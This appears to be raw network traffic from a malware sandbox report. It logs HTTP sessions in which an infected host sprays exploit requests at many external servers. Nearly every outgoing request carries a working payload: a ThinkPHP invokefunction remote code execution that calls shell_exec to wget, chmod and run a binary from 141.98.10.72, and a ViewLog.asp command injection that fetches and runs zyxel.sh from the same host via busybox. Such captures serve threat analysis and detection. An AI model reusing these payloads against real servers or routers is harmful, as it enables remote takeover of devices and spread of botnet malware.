                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1350192.168.2.144007288.221.4.12880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:03.904055119 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.109708071 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:36:04 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:04 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 65 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 34 26 23 34 36 3b 66 61 34 30 30 30 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;aee6655f&#46;1707899764&#46;fa4000c</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1351192.168.2.144747688.151.216.1980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.102653027 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.301764011 CET338INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:03 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1352192.168.2.145248888.221.141.7380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.109256029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.314753056 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:36:04 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:04 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 39 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 34 26 23 34 36 3b 31 36 31 30 62 62 63 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;295a1602&#46;1707899764&#46;1610bbcd</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1353192.168.2.144386062.202.159.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.137123108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1354192.168.2.145952631.136.161.2048080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.144361973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.769788027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:06.049629927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:08.801657915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.921289921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1355192.168.2.143635462.44.122.348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.163619041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.385828018 CET390INHTTP/1.1 401 Unauthorized
                                                        Server: nginx/1.3.4
                                                        Date: Wed, 14 Feb 2024 10:36:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 194
                                                        Connection: keep-alive
                                                        WWW-Authenticate: Basic realm="WISPR"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.3.4</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1356192.168.2.144563431.200.111.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.190407991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1357192.168.2.144269688.5.112.5380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.316112995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.547000885 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1358192.168.2.145647095.141.40.16180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.331460953 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.552540064 CET479INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1359192.168.2.143360431.182.115.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.383537054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1360192.168.2.143431231.136.113.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.385745049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:05.057707071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:06.401725054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.313496113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:14.689477921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1361192.168.2.144929895.226.94.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.389977932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.617944956 CET412INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:36:12 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=180, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1362192.168.2.143923631.216.105.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.429812908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.681826115 CET273INHTTP/1.0 400 Bad Request
                                                        Server: Streamd,60E32754942F
                                                        Date: Wed, 14 Feb 2024 08:36:03 UTC
